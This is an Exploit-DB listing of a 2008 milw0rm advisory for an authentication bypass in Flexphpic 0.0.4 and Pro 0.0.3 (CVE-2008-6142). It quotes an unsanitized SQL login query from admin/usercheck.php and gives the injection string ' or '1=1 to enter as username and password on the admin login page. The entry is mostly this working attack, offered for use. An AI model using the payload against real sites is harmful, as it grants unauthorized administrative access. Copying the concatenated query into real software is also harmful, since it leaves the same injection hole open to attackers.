Flexphpic 0.0.x - Authentication Bypass

Author: S.W.A.T.
type: webapps
platform: php
port: 
date_added: 2008-12-29  
date_updated: 2017-01-23  
verified: 1  
codes: OSVDB-51161;CVE-2008-6142  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comflexphpicproen.zip  

raw file: 7624.txt  

#############################################
Autore: S.W.A.T.
Email: svvateam@yahoo.com
Site: Www.BaTLaGH.coM
Cms: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Download: http://www.china-on-site.com/flexphpic/downloads.php
##############################################
Bug In \admin\usercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:

Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1

I'll Be   A C I D A L !!!

# milw0rm.com [2008-12-30]